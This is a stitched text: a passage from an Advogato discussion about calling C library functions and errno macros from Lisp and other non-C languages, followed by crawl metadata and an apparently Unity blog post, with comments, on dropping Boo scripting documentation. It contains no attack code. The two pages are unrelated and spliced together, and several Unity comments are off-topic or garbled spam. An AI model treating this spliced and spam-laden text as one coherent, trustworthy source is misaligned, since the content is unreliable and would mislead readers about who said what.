favourite. So, the stated intention that Lisp be supported everywhere may these days be as relevant as the original intention that GNU support MIT Chaosnet, or be initially targetted at 68k machines, because we have this wide choice of other expressive languages that let us get the job done more quickly than C But: systems programming? All of these language implementations - or all that I've seen - are second-class citizens. They're implemented on a C substrate. When you call stat() in Perl, it doesn't make a system call. It calls some C code, and that calls the shared C library, and that makes a system call. The Perl interpreter marshalls its arguments and massages them into C calling convention, and the C library insulates us from the kernel-specific details, allowing kernel developers to make changes as necessary when things like 64 bit uids or files bigger than 2Gb come along. Most of this is basically inescapable. The C library and its friends implement POSIX - or whatever it's called today - whereas the kernel implements whatever it feels like. POSIX is documented. The C calling convention is unlikely to be changed any time soon. Using this sounds like a net win. Now then. My preferred non-C language implementation on Linux comes with a native-code compiler. I can write code in this language that runs within n% of the speed of C (n == "small enough not to care"). If I use appropriate definitions to describe the C-style functions I want to call, it can generate code which calls them just like that. Inline. No timewasting subroutine calls, no copying stuff around - just get the address using dlsym() or equivalent and jump to it. There's still a problem with symbolic constants. We can find the address of open() easily enough, but where do we get the value of O_RDONLY? According to the manual page (and I'm assuming from that, POSIX), we should have this value if we #include <sys/types.h>, <sys/stat.h> and <fcntl.h>. OK. Cool. Now all we need to do is (a) implement cpp, and (b) find out all the symbols that the C compiler has defined when it starts up (echo | gcc -v -E -) There's another problem with structures. Now we need to implement a complete C parser as well as cpp, and it needs to know the platform's rules for structure packing. Happily neither of these are insuperable, but it gets ugly. We can write an autoconf-ish thing that runs a C program at build time to get all these values from the actual C compiler. Messy, but it works. OK, we've called the function; it should have opened a file. The return value will tell us, and errno will tell us what went wrong if we didn't. That's an integer, right? Nope. It's a preprocessor macro. Moreover, it's a preprocessor macro which expands into something with leading underscores, which means it almost certainly won't stay like that. How the dickens am I supposed to call that, then? I have to write a C function that returns the value of errno, and call that function every time I want to find out what it's set to. To find a value which was actually returned by the system call, and subsequently squirreled out of sight by the syscall glue, I have to write and call a function. Do I feel like attention to non-C languages is low on the priority list for libc developers? Yes, maybe I do. My opinion: if you're writing an API - I'd be interested to hear what other issues people have come up against when designing APIs that non-C-language users can use, or in trying to use other people's APIs from non-C languages. Garbage collection and threading are two possible other areas of contention. Discuss. (Footnote: the language I refer to is of course Common Lisp, and the implementation is CMUCL. More detail on my diary page) I can certainly see the problems you're facing. I'd like to see the language binding people get together and produce a document that contains guidelines for api designers about how to make life easier. One thing that comes to mind: if you're going to have structures, provide set/get functions to muck with the structure internals. From what I've seen, it's easier for language bindings to deal with functions than with data structure internals. That said, I want to take your basic argument one step further. I believe that, in nearly all cases, macro expansion is a bad way to get things done. It's seductively easy and relatively powerful, and appears to increase the level of abstraction. However, a lot of the times, it just doesn't work. More specifically, it works well enough for the narrow purpose for which it was originally intended, but fails pretty badly in any broader context. A particular concern of mine is error reporting. Macro expansion violates the one of the main principles of cyberbitchology, which is to catch errors as early as possible. Once you've expanded the macro, you've lost the original context containing the error. Hence, inscrutable error message. Here's a simple example off the top of my head: #include <glib.h> int main () { int i; char *p = g_new (i, 1); } Try to compile it, and what do you get? "5: parse error before ')'". Not "g_new's first argument must be a type, not a variable". Ok, so this isn't very horrifying, so try making a random error in a LaTeX file. Better yet, an autoconf script :) In addition to error reporting, macros also makes analysis of files intractable. In addition to simply being another layer of indirection, it can be difficult to the point of the halting to invert what the macros are doing (although I don't think cpp is quite Turing complete, it's still hard). Extensive use of preprocessor macros is also notorious for making debugging hard. This is basically an insoluble problem. The compiled code is the result of macro expansion, but the source the debugger is trying to show you is the input. This is one good reason to use preprocessor macros as sparingly as possible. Next time you're tempted to use macros to solve a problem, think twice. Have you given up the possibility of clear error reporting? Are there other contexts, such as analysis, for which the macros are making life harder? Macro systems like that of Lisp don't suffer from the kinds of problems raph describes. That's because the surface syntax is trivial (it's almost impossible to screw up paren matching with a good [read `Emacs'] editor), and the macro-expansion language, being the Lisp language itself,is powerful enough to do any additional error-checking that's required. On the other hand, the Lisp macro system _can_ make complex systems hard to understand if overuesed. To understand a complex Lisp system, it is widely reported, one must first understand it's macrology. Couple of questions for Raph: Would arguments against macros apply to codes which by necessity have deeply nested, highly iterative loops? For example, shoving function calls into the inner loop of an O(n^3), O(n^4) algorithm tends to degrade performance. On the other hand, writing such functionality explicitly may add several pages of printout to a function already a dozen or more (say) pages long. Using macro expansion increases code readability without sacrificing performance. If such macros were first implemented as functions, exhaustively tested, then turned into macros, what is the harm? Would arguments against macros apply to codes which by necessity have deeply nested, highly iterative loops? If that's the only way to do it, that's the only way to do it. However, I would want to ask the obvious questions - Not all of these are necessarily always applicable - you may be targetting users with stupid compilers, for example. But do test first. Premature optimization is the root of all evil, etc etc Interestingly, the Plan 9 C Compiler written by Rob Pike accepts a somewhat smaller language than ANSI C. deeply nested, highly iterative loops? If that's the only way to do it, that's the only way to do it. However, I would want to ask the obvious questions - All the documentation I have read concerning inline functions states that inline is a *suggestion* which the compiler is free to ignore at will. I welcome comments to the contrary. (I have Edith Hamilton for mythology.) In the sense that it is possible to compute exactly how many times an arbitrary operation is performed in an algorithm such as GE, why is profiling data relevant? There are several reasons for macro abuse in the C library. The inability of the C standards committee to use a crystal ball being one highly forgivable case In general inline is better, but even now gcc inline isnt always generating such good code as macro tricks, especially with constant evaluation/optimisation tricks. I am the original author of MlGtk, an interface between Gtk+ and Objective CAML. I would perhaps suggest that APIs be specified in the following fashion: A nice practical solution to this would be a small library that contains function wrappers for things like the value of errno, and comes with an easily-parseable file format (similar to the GTK+ defs files) that listed symbolic constants and such. Many POSIX language bindings could then use this little library. A similar thing is basically needed for GTK+, except that the functions can go in GTK itself (avoiding the need for the!
http://www.advogato.org/article/39.html
CC-MAIN-2015-40
refinedweb
1,920
61.26
I’ve ben using Fabric to concurrently start multiple processes on several machines. These processes have to run at the same time (since they are experimental processes and are interacting with each other) and shut down at more or less the same time so that I can collect results and immediately execute the next sample in the experiment. However, I was having a some difficulties directly using Fabric: - Fabric can parallelize one task across multiple hosts accordint to roles. - Fabric can be hacked to run multiple tasks on multiple hosts by setting env.dedupe_hosts = False - Fabric can only parallelize one type of task, not multiple types - Fabric can’t handle large numbers of SSH connections In this post we’ll explore my approach with Fabric and my current solution. Fabric Consider the following problem: I want to run a Honu replica server on four different hosts. This is pretty easy using fabric as follows: from itertools import count from fabric.api import env, parallel, run # assign unique pids to servers counter = count(1,1) # Set the hosts environment env.hosts = ['user@hostA:22', 'user@hostB:22', 'user@hostC:22', 'user@hostD:22'] @parallel def serve(pid=None): pid = pid or next(counter) run("honu serve -i {}".format(pid)) Note that this uses a global variable, counter to assign a unique id to each process (more on this later). What if I want to run four replica processes on four hosts? We can hack that as follows: from fabric.api import execute, settings def multiexecute(task, n, host, *args, **kwargs): """ Execute the task n times on the specified host. If the task is parallel then this will be parallel as well. All other args are passed to execute. """ # Do nothing if n is zero or less if n < 1: return # Return one execution of the task with the given host if n == 1: return execute(task, host=host, *args, **kwargs) # Otherwise create a lists of hosts, don't dedupe them, and execute hosts = [host]*n with settings(dedupe_hosts=False): execute(task, hosts=hosts, *args, **kwargs) # Note the removal of the decorator def serve(pid=None): pid = pid or next(counter) run("honu serve -i {}".format(pid)) @parallel def serveall(): multiexecute(serve, 4, env.host) Here, we create a multiexecute() function that temporarily sets dedupe_hosts=False using the settings context manager, then creates a host list that duplicates the original host n times, executing the task in parallel. By parallelizing the serveall task, each host is passed into the task once, then branched out 4 times by multiexecute. Now, what if I want to run 4 serve() and 4 work() tasks with different arguments to each in parallel? Well, here’s where things fall apart, it can’t be done. If we write: @parallel def serveall(): multiexecute(serve, 4, env.host) multiexecute(work, 4, env.host) Then the second multiexecute() will happen sequentially after the first multiexecute(). Unfortunately there seems to be no solution. Moreover, each of the additional tasks opens up a new SSH connection and many SSH connections quickly become untenable as you reach file descriptor limits in Python. Concurrent Subprocess Ok, so let’s step back - Fabric is great for one task to one host, let’s continue to use that to our advantage. What can we put on each host that will be able to spawn multiple processes of different types? My first thought was a custom script, but after a tiny bit of research I found a StackOverflow question: Python subprocess in parallel. The long and short of this is that creating a list of subprocess.Popen objects allows them to run concurrently. By polling them to see if they’re done and using select to buffer IO across multiple processes, you can collect stdout on demand, managing the execution of multiple subprocesses. So now the plan is: - Fabric sends a list of commands per host to pproc - pproc coordinates the execution of processes per host - pproc sends Fabric serialized stdout - Fabric quits when pproc exits I’ve created a command line script called pproc.py that wraps this and takes any number of commands and their arguments (so long as they are surrounded by quotes) and executes the pproc functionality described above. Consider the following “child process”: #!/usr/bin/env python3 import os import sys import time import random import argparse def fprint(s): """ Performs a flush after print and prepends the pid. """ msg = "proc {}: {}".format(os.getpid(), s) print(msg) sys.stdout.flush() if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("-l", "--limit", type=int, default=5) args = parser.parse_args() for idx in range(5): worked = random.random() * args.limit time.sleep(worked) fprint("task {} lasted {:0.2f} seconds".format(idx, worked)) This script is just simulating work by sleeping, but crucially, takes an argument on the command line. If we run proc as follows: $ pproc "./child.py -l 5" "./child.py -l 6" "./child.py -l 4" Then we get the following serialized output: proc 46145: task 0 lasted 2.68 seconds proc 46146: task 0 lasted 3.13 seconds proc 46145: task 1 lasted 0.95 seconds proc 46144: task 0 lasted 3.70 seconds proc 46144: task 1 lasted 0.15 seconds proc 46146: task 1 lasted 1.12 seconds proc 46145: task 2 lasted 2.90 seconds proc 46146: task 2 lasted 2.80 seconds proc 46144: task 2 lasted 3.67 seconds proc 46146: task 3 lasted 0.59 seconds proc 46144: task 3 lasted 2.30 seconds proc 46146: task 4 lasted 2.23 seconds proc 46145: task 3 lasted 4.65 seconds proc 46144: task 4 lasted 3.06 seconds proc 46145: task 4 lasted 4.05 seconds Sweet! Things are happening concurrently and we can specify any arbitrary commands with their arguments on the command line! Win! The complete listing of the pproc script is as follows: Experiments So what was this all for? Well, I’m running distributed systems experiments, and it’s very tricky to coordinate everything and get results. A datapoint for an experiment runs the entire system with a specific workload and a specific configuration for a fixed amount of time, then dumps the numbers to disk. Problem: For a single datapoint I need to concurrently startup 48 processes: 24 replicas and 24 workload generators on 4 machines. Each process requires a slightly different configuration. An experiment is composed of multiple data points, usually between 40-200 individual runs of samples that take approximately 45 - 480 seconds each. The solutions I had proposed were as follows: Solution 1 (by hand): open up 48 terminals and type simultaneously into them using iTerm. Each configuration is handled by the environment of each terminal session. Experiments take about 4-5 hours using this method and is prone to user error. Solution 2 (ssh push): use fabric to parallelize the opening of 48 ssh sessions and run a command on the remote host. Experiment run times go down to about 1.5 hours, but each script has to be written by hand and am also noticing SSH failures for too many connections at the higher levels, it’s also pretty hacky. Solution 3 (amqp pull): write a daemon on all machines that listens to an amqp service (AWS SQS is $0.40 for 1M requests) and starts up processes on the local machine. This would solve the coordination issue and could even aggregate results, but would require extra coding and involve another process running on the machines. The solution described in this post would hopefully modify Solution 2 (ssh push) to actually make it tenable.
https://bbengfort.github.io/2017/06/concurrent-subprocesses-fabric/
CC-MAIN-2021-17
refinedweb
1,268
56.25
Documentation, Unity scripting languages and you of scripts created in the three languages break down like this: This means that, as so few people use Boo, and the resources required to support it in the docs are not negligible, we’ve decided to drop support for Boo documentation for the Unity 5.0 release and use our resources in a more constructive way. When Unity 5.0 launches, we will also drop “Create Boo Script” from the menu. That said, and very importantly, if your project contains Boo scripts, they will still work just as before. We have listened to your feedback, and what you’ve been telling us that you really want from your documentation is C# examples across the board. As a consequence, we’re also moving internally to provide the best support for C# that we can. Currently, most Tutorials, and Sample Assets are based around C#, and in the 5.x cycle, we’ll ensure that all our C# examples in the documentation are first-class citizens. Side note: up until now, our internal procedure has been to write sample code using UnityScript / JavaScript, which is then automatically converted to C# and Boo. We’ve now made it possible for Unity engineers to author their examples in C# and auto-convert them to UnityScript, using a newly developed and improved C#-to-UnityScript converter. Thus, many of the C# examples you’ve been requesting are now live, and even more will be ready when Unity 5.0 comes out. W00t! Related posts 86 CommentsSubscribe to comments MickOctober 14, 2014 at 3:58 am Ahahaha !!! Your picture is awmsoe, Thiago!About CCR they’re soooo cool! I bought an album in a small music store in Lisboa last summer, with two different versions of Susie Q. One studio version, one live. That song is just amazing. Like the rest of this album.By the way, there’s a band not far from Fredrikstad that has made CCR music its specialty. They call themselves CCA Creedence Clearwater Arrival and they’re quite good. Can’t measure the original, though WazzaM - Lokel DigitalSeptember 26, 2014 at 10:13 pm I think Unity have made a wise decision by dropping Boo. Likewise Javascript and C# are great languages well worth keeping as has been pointed out by others before me. The genius of Unity’s architecture with Mono’s implementation of .NET’s IL means that supporting multiple languages is easy from a runtime perspective but it’s not free to test, support and document the usage of multiple languages in game development on the Unity engine. Again dropping Boo, given it is so infrequently used, makes perfect financial sense. Use that energy to make the engine better. I like Python but I found Boo too different to Python to make me want to use it. (Boo is Python-like if you didn’t know that…) There is some confusion in the comments. C# is not C! Not even close! So the comment that C is a 30 year language … doesn’t help anyone. C# is a merge of C++ keywords sitting on top of Java and Delphi semantics. Apple hasn’t dropped C. Guess what most operating systems are written in. C is never, ever going away but is increasingly relegated to low-level code (device drivers, core OS). However, that’s an entirely irrelevant and futile argument since C has no relationship to Unity whatsoever. Dear Unity, please keep supporting Unity/Javascript as you have and I’m glad you’re raising C#’s profile internally. Personally I find the C# development a bit more precise. FattieSeptember 15, 2014 at 9:45 am. So you’re dumping Boo – thank goodness. This article hints you will eventually dump u/s. Quite simply, the longer you wait to do that, the worse it is for everyone. WiillOctober 9, 2014 at 9:56 am I’m no longer ctearin the place you’re getting your info, however good topic. I must spend some time finding out much more or working out more. Thank you for fantastic information I was looking for this info for my mission. MeriOctober 14, 2014 at 3:19 am I’ve come across that ndyoaaws, more and more people are being attracted to video cameras and the issue of digital photography. However, being a photographer, you will need to first devote so much time frame deciding the exact model of video camera to buy as well as moving via store to store just so you could buy the lowest priced camera of the trademark you have decided to choose. But it doesn’t end there. You also have to contemplate whether you should obtain a digital digital camera extended warranty. Many thanks for the good ideas I received from your weblog. ClonkexOctober 21, 2014 at 2:32 pm How can you SAY that?! Javascript is WAY easier than C# and I would be forced to drop Unity if they dumped JS! I’m horrified that people think that way. It would take weeks for me to learn C# over JS. AlbertoSeptember 13, 2014 at 12:01 pm Please in Unity 4.5 change the net framework so that we can write script in net framework 4.5. This will allow to have more advanced stuff. Mark HessburgSeptember 11, 2014 at 5:35 pm I absolutely prefer UnityScript and I am a paying customer and I work full time with Unity. I doubt the editor statistics will know if a C# script comes from the asset store. There are thousands of people using Unity like some WYSIWYG tool. Think of all the postings “Do I really need to learn coding to make a game in Unity?” or the success of tools like PlayMaker. A large portion of the Asset Store developers and PlayMaker uses C# hence the statistics will automatically be strongly biased due to people who does not script at all. I’m programming since 1982 and I don’t want to use C# because I just don’t like it, one reason why I’m using Unity is UnityScript. A lot of the steps Unity took since when I started using it in 2007 were often bad for the overall experience of Unity (especially the Free version but also the Windows Editor flooded the forums with… well, let’s say it in a more polite way: people who are disturbing the formerly great and useful experience you could have with the community.) The Asset Store which was a nice Idea but results in mostly terrible Assets for people who want to use things in a plug & play way that often requires a lot of work to get rid of the annoying “useful stuff” first before you can really integrate it. But who cares? Just don’t use it, just don’t visit the forums too often and it is OK. But now when real features like support of different languages start to disappear then this is affecting me directly and this is really a bad thing. The day you drop US is the day you will start losing my money – seriously. 3DgerbilSeptember 11, 2014 at 3:25 pm Please don’t drop UnityScript, or I’ll drop Unity…. Shouldn’t we realize that C is now a 30-years old dinosaur that has patched and repatched to handle OOP ? Even Apple started the path of abandoning C by introducing Swift… 30 years time is an enormous time in computing world; would you cross the Atlantic on a piston engine aircraft just because you’re used to it ? Jashan ChitteshSeptember 11, 2014 at 12:40 am Great move, and thank you for sharing the statistics. So it seems that UnityScript lost a lot of popularity in recent times – in my poll that was started Feb 29, 2009 and is still ongoing, it’s still 53% (see also: … unfortunately, it got severely broken by the new forum software :-( ). Personally, I think UnityScript is not a language anyone should use but as long as it doesn’t consume a lot of resources, I don’t mind having it around (as long as no one wants me to use it ;-) ). ClonkexOctober 21, 2014 at 2:35 pm Now what’s wrong with UnityScript? It’s easily as good as C# and way easier to use. PaulSeptember 9, 2014 at 2:44 am I think it’s totally wrong, because I’m boo user who is a brilliant language and, moreover, for developers who use Python becomes easier to recognize the Unity 3D, i have projects 100% in boo and my developer team only works with boo. The boo has this low percentage because it is being ignored by propia Unity, does not disclose, says nothing about boo, only C # and sometime Js (unity script), because there is no support in the community about boo with this language more difficult to learn. However I will make a boo in Package for Unity 5 for support in boo Nathaniel SabanskiSeptember 8, 2014 at 7:24 pm Community supported documentation is a great idea. It has proven to work very well for communities such as PHP (say what you will about the language but it has arguably has some of the most useful technical docs of any community). I would be more than happy to contribute Boo documentation for Unity API’s I happen to use… preferably if contributions with upvote/downvote or are integrated (for quality control). JamieSeptember 8, 2014 at 5:38 am @boaz, a community supported documentation would be superb. I’d happily help contribute to the Boo documentation. And it’d be a shame to see the hard work of documenting Boo through the 4.x cycle tossed away. BoazSeptember 7, 2014 at 11:43 pm I also resonate with better c# documentation and examples for all of unities features. However, I think it’s a shame to drop boo. Right now boo is going through a vicious cycle- not enough documentation -> not enough users and so fourth. Please consider leaving boo in, and opening the official unity documentation to community support. When we have complete c# documentation the community can easily translate everything to boo. Peter DwyerSeptember 7, 2014 at 1:31 pm On the subject of scripting. Can we get a quick blog on the state of the universal asset bundles. I believe 5.0 is supposed to introduce asset bundles that don’t become useless when unity versions change. Is this still the case? Dorin GRIGORESeptember 6, 2014 at 4:47 pm Very Good! I use C# and i’m profesional web/js developer. I prefer C# in Unity. PedroSeptember 6, 2014 at 4:39 pm I really love Javascript , and is easy to learn. ! ;) BeliarTheEvilSeptember 6, 2014 at 5:12 am @Jim Preston: I agree that python is a superior language, I’ve been a python coder for years and besides agreeing with some criticism and limitations, overall it’s MUCH better than pretty much any language out there imho. The problem of python is performance, that’s why I advocate cython over python for anything real time. With cython you can “compile” python code into c binaries, which per se are much faster than the thing running interpreted in cpython, but the real power of cython is that simply by declaring some c types you get incredible performance. Last benchmarks I did it was much faster than mono on Linux, getting very close to hand written c++ and java. And a very good thing is that the source protection is actually decent because there’s no way someone can get back the python code from the c binaries generated by cython, in fact even the c code is pretty much unreadable… I wonder what kind of binary that code generates when compiled with optimizations and stuff. The problem with cython is that somehow that amazing piece of software is unknown… Plus people are ignorant about its features and amazingness. A very nice thing is that you can simply program in standard python, which works just as fine in cython, and optimize only the performance critical code, by adding some “cdefs” here and there. So, basically menus and other stuff would be standard python and the only things going to be optimized are the ones that run in updatexxx. I can’t imagine the productivity boost… Of course that’s never gonna happen, and c# isn’t a terrible language IMHO. Jim PrestonSeptember 6, 2014 at 1:38 am We’re moving to Python 3.x for Web dev. Python is growing in popularity. JavaScript and PHP are limited. C# is like driving an old truck unless that’s all you do in life. Please think about how many users you would pick up with Python. It has far more different use cases than many other languages. JamieSeptember 6, 2014 at 1:10 am I understand the rational, but am saddened to see Boo losing official support. It was only in 4.x that Boo actually got reasonable documentation – which is why I suspect it lagged behind the other languages in popularity. It’s a shame to see it being somewhat dropped – it made bouncing from Python at work to Boo in the evenings fairly easy. TaugeshtuSeptember 5, 2014 at 12:44 pm @And no, you won’t write scripts faster or easier in JS/Boo. Have you actually tried writing code in Boo yourself? And not in “well, I have 5 minutes to spare, let’s try this” way. I bet you didn’t. Boo pros compared to C#: Indexed properties: MyClass.Stats[StatsEnum.Strength] = 5 Direct access to Vector fields in transforms: transform.localPosition.x = 0 Pain-free dynamic typing: x as duck = “I’m a string now, but I can be anything!” Who needs structs to return multiple parameters from function? def Some( x as int ) as (int): return x, x*2, x*4 … x, y, z = Some( 2 ) Array/List comprehension is somewhat debatable given C#’s LINQ, but generally, when you know what you’re doing with Boo – you do write faster with it. There are problems, of course, mostly caused by Unity compiling c# and boo separately. Therefore boo isn’t something I’d go with for production. But it’s an exceptional dose of fun when I just want to make something for myself. Boo makes programming fun again. Shame Unity decided to even produce UnityScript, we could’ve had 20% of people using Boo now… ClonkexOctober 21, 2014 at 2:38 pm If Unity had not created UnityScript, I would not be using Unity today, and neither would 18.9% of their current users. A*September 5, 2014 at 12:19 pm Hi, JS is easier than C#, but C# is a “real” language supported and used widely, more powerful, versatile, and feels natural with unity with a lot of features. However learning it is not as easy as JS, so this is the point. #####I want to Unity to provide for beginners C# learning tutorials at least to get them started in using unity##### charles lSeptember 5, 2014 at 7:11 am I use unityScript java,, and i need to use unity 3d with. I have misery with c# and boo. Please keep US ! atoi2008September 5, 2014 at 5:58 am I know java, and I find US confusing. In Java I can initialize my variables using public int or private bool. In US I’m a little lost on the syntax with the colon in there and it doesn’t feel like Java at all to me. C# seems more familiar, almost exactly like Java in my opinion and why I prefer to use it. artemisartSeptember 4, 2014 at 8:15 pm Would it be possible to support languages such as F# or Nemerle ? or provide support for custom compilers ? shetstormSeptember 4, 2014 at 8:07 pm The best thing Unity can do before killing JS and Boo is to provide a JS/Boo 2 C# script converter. As for syntax, come on, it’s almost identical. And no, you won’t write scripts faster or easier in JS/Boo. ClonkexOctober 21, 2014 at 2:41 pm I can’t speak for Boo as I’ve never looked at it, but JS/US? Yes, yes I do write scripts far quicker and much easier than C#. C# feels heavy and messy and I simply don’t like it. GOBLA GamesSeptember 4, 2014 at 6:21 pm ok i totally agree with removing boo language from unity editor but you have to support java script also plus c# i am one of developers who work with 2 languages in one project if you have 20 people work using c# and 8 people work using Jscript that is not mean to just support the 20 peoples you have to give the other their rights for learn in improve their self BeliarTheEvilSeptember 4, 2014 at 4:06 pm Hey there… It was about time to dump Boo imho. Sometimes I wish Unity had only C# to begin with, that way I wouldn’t be able to choose JS for my games (worst decision ever) which seriously lacks a decent editor… I never had real problems doing stuff with a mix of 3rd-party C# code and my own JS code, however, when I need to code in C# it’s so much better… Monodevelop in it’s utter stupidity, actually helps you code, while in JS it goes breaking your code as you type, unless you completely disable the code helpers, in which case it turns into something like a broken Windows 3.1 notepad. Code helpers are really helpful so you don’t have to keep the entire docs in your mind, however, you have to hit ‘esc’ all the time because MD is so dumb and you also have to hit ‘ctrl+z’ lots and lots of times when it change your code to something incredibly stupid. I just wish MD had ‘non-intrusive’ code completion and helpers, something that just shows you the help but doesn’t change your code without you asking it to do that. It’s extremely frustrating when you go back to Unity and sees a lot of errors because MD broke your whole code. I’m not even saying that all the pads don’t work for JS… you don’t even have a code outliner, if you need to quickly find a function, there’s no easy way to do that, the fastest way is to hit the hotkeys for ‘find’ or ‘find in all files’ and type the function, which is a little bit better than windows 3.1 notepad. I keep wondering… if people use UnityVS because according to them MD sucks for C#, and compared to the JS support, MD is a dream to program in C#, I wonder how they would rate MD for JS… I mean, we’re using the “sh*t of the sh*t” :D hahaha. I really like JS, it’s so much simpler than C#, however, due the lack of a decent editor, I’m planning to dump JS asap and go for C#, perhaps I will even sign up for bizspark (or something) to use UnityVS instead, which seems to be the most decent editor for Unity scripts. LunarcloudSeptember 4, 2014 at 2:52 pm I’m a full-time Javascript / HTML5 developer and had to stop using UnityScript because it’s just *NOT* the Javascript I’ve come to love. It’s missing too much. It’s too weird. To help the context switch, and use a stronger game-making language, I use C# TilesSeptember 4, 2014 at 1:10 pm Uniscite is still my favourite. For downloading Uniscite, just download an older Unity version before version 4 ( I think they removed Uniscite with 4.3, but am not sure). And grab Uniscite from there. I also never understood why people wants to remove a language at all. It makes Unity less powerful. I still vote for even more languages, not fewer. Dropping existing languages is not good. Even in the case of BOO it removes quite a few users from the list. I doubt that dropping the support for BOO will even play in the costs for those now lost users. And it increases the fear that JS is the next language to be dropped. This has something to do with trust. And so it is not really a clever move. And there just IS a difference between C# and JS, which really makes a difference. Ralph HauwertSeptember 4, 2014 at 2:04 pm We absolutely don’t mean to erode your trust, which is also why we are making these very soft changes. As for more languages; you actually illustrated the problem if we do that today; as we start supporting a language, the expectation is that we will keep on supporting it for at least an x amount of time for a y amount of users. For that simple reason, both addition and removal are things that we have to very carefully consider. As I’ve mentioned, we have loose thoughts on for example pluggable language support, but no real plans today. NothanksOctober 27, 2014 at 9:41 am Horrible idea. Maintaining a language takes time. Every language that they have to maintain takes time away from actual development of new features. VectrexSeptember 4, 2014 at 12:48 pm All I ask is that the { brace be on the NEXT line :) Including the ‘create new C#’ template. You wouldn’t believe how much that confuses my students. Ralph HauwertSeptember 4, 2014 at 2:04 pm You are asking for a change in the default template for C# monobehaviours ? AylinOctober 10, 2014 at 3:28 am Looking at the migration oveirvew ? PangitOctober 14, 2014 at 4:00 am With almost eheyrtving. Sinister MephistoSeptember 4, 2014 at 12:12 pm About time. dasdSeptember 4, 2014 at 10:53 am I wanna use C++ do they have it? LOL user13September 4, 2014 at 8:35 am Please give download link for UniScite, or include it in future version of the software, it’s good enough for those who want UnityScript, Mono is slow in my Computer. Ofc I could just get it from old version of unity, but those are big downloads just for the small 1/2 mb editor.. i hope i am not the only one who wants UniScite. Or anyway, just a download link in the comment, will be enough too.. Thanks Ralph HauwertSeptember 4, 2014 at 2:06 pm You can get UniScite from older versions of Unity, but we don’t do actual support on it anymore. Sebastian KSeptember 4, 2014 at 7:44 am I really hope this is not a step towards removing Boo entirely… I use it for the vast majority of my projects. It rocks! I also do not understand how people can argue FOR removing languages… Why would you want to make Unity less powerful? Not everyone wants to work in C#. They pretty much get Boo support for free under Mono. The ability to select your language is a unique and awesome feature of Unity, whether it be Javascript, C# or Boo. Experienced users shouldn’t have much trouble referencing the API regardless of samples… but that sucks for newcomers! Removing the shortcut to “Create Boo Script” feels like a step towards removing the language… I genuinely hope not! Ralph HauwertSeptember 4, 2014 at 1:47 pm Sebastian, as you can see Boo is still there in 5.0, but we are remove buttons and docs. We are following our stats on this and subsequently following our users in terms of on what work we put resources. ChristopherSeptember 4, 2014 at 7:17 am I love this, but I think dropping Boo all together would be a better move. It is rarely used by anyone and maintaining support for it consume resources. Ralph HauwertSeptember 4, 2014 at 1:48 pm UnityScript relies on Boo; for us to remove compiler support for something that is there either way would be unnecessary. WANSeptember 4, 2014 at 4:34 am I prefer unity script, because I’ve been doing web development with javascript, I’m more familiar with it than C#. I will continue using it as long as it is supported. koblaviSeptember 4, 2014 at 3:43 am Nice Move, sounds fair. I just think this should have been done 3 years ago. Looks like the language itself is a self-fulfilling prophecy (Boo has just been ‘Booed’ of stage) :-P. I agree with the notion that Unity should eventually move towards official support for only C# both in terms of documentation and examples. UnityScript and C# are just too similar. Besides, C# has cleaner syntax and is more widely supported even outside of the unity community. Finally (and I have said this before in a previous post) Unity should work on allowing language bindings for other Languages that are not officially supported by unity but compile to IL (without the DLR parts). Unity already supports other languages (sort of) as long as you drop the compiled DLL into the editor and not the source. It would just be nicer if you could just double click source and edit & drag and drop just about any .NET language in the editor provided you have the necessary binding module installed :-) . Sure it entails a bit of work. But it will really be nice if you can tell developers that they can use any .Net language to write scripts in Unity Ralph HauwertSeptember 4, 2014 at 1:50 pm The idea of pluggable languages is something we are thinking about, but we currently have no solidified plans in that direction. I do feel it does generally make sense though, but again, no solidified plans to put effort in that today. BobOctober 17, 2014 at 5:47 pm The lack of pluggable languages is the only thing holding me back from using Unity. I think, anecdotally, that there are many programming teams out that that just can’t swallow the idea of being locked into a particular language like C#, or worse, a kinda-javascripty language that doesn’t really function the same as what everybody already knows. Unity really is an outlier in this sense, the standard practise is to provide API bindings and let the community do the heavy lifting. YoyoSeptember 4, 2014 at 2:05 am please don’t drop javascript/UnityScript unless you intend to replace it with a built-in Blueprint-type of visual language . As a beginner I find Unityscript easier to deal with than C# Ralph HauwertSeptember 4, 2014 at 1:54 pm Have a look at the Unite 2014 – Keynote video, in which Lucas is showing a sneak peek at a research project that has been going on; HeliosDoubleSixSeptember 4, 2014 at 12:08 am Now just get rid of UnityScript so you can add fully concnetrate on proper editor inspector support and serialization for all the C# things such as Dictionaries, Interfaces / Polymorphism and so on…. till then FullInspector ho! ChillersanimSeptember 3, 2014 at 10:58 pm Apart from the discusion whether to use US or C#, I would also like to remark something about the documentations. As it is now, most components are quite good documented. But subparts like enums and stuf are not yet documented. You can’t see which value does what for example. Also I would really like it, if I could see somewhere which features are available in which Unity versions. It would help a lot by making assets backward compatible. Thanks Ralph HauwertSeptember 4, 2014 at 1:56 pm Good points, I’ll let Aleks comment on this. As for “assets backwards compatible”; I’m not sure what you are asking for; however, for 5.0 we are planning to ship with something to call the script updater, that does it best to update your projects code to conform with new / changed api’s. KaylanaOctober 9, 2014 at 10:43 pm That’s a posting full of inighst! YoujinOctober 14, 2014 at 3:59 am This is cute blue mittens free getnit. Emil "AngryAnt" JohansenSeptember 3, 2014 at 10:34 pm @Nathaniel Given the size of the community and even a pessimistically low guesstimate of the sample size used to generate the division referenced in the post, do you honestly believe that the number of entirely closed projects you refer to could significantly change the percentages? Undoubtably the departure of Rodrigo has reduced the internal amount of support for Boo. However he was one awesome dude in a large and still growing company. Again, a simple look at those figures would, at least to me, convey that one strong advocate for or against would not do much to change the outcome. @Nikko If C# were a proprietary language, do you really think that Unity would have dared to rely on Mono for scripting for so long? Or for that matter that any of the larger companies licensing Unity would dare to do so? Personally, I can’t really fault Unitys logic behind this move. However I am very much hoping to see a pluggable compiler pipeline at some point and looking forward to the kind of community projects that would sprawl around such a feature. Peter DwyerSeptember 3, 2014 at 10:16 pm @Nathaniel to be fair to unity. They dropped Boo because it’s simply not used in anywhere near the amount of volume as either UnityScript or C#. Just from personal experience I have never met one person who used Boo and I move in both the Indie and AAA circles regularly. Nathaniel SabanskiSeptember 3, 2014 at 10:10 pm I think this is a mistake. Boo is a brilliant language for pro Unity people and can drastically increase the expressiveness of your code VS number of lines written. There are probably entire closed source games not being counted in the ratio above. Probably has something to do with Rodrigo leaving? Ralph HauwertSeptember 4, 2014 at 1:57 pm The stats come from the editor, so closed source wouldn’t mean much for the statistic. The reason why we are doing this is because we are following where are users are going and generally allocating resources where they are most wanted and effective; with boo having low numbers like this, not having it as a first class 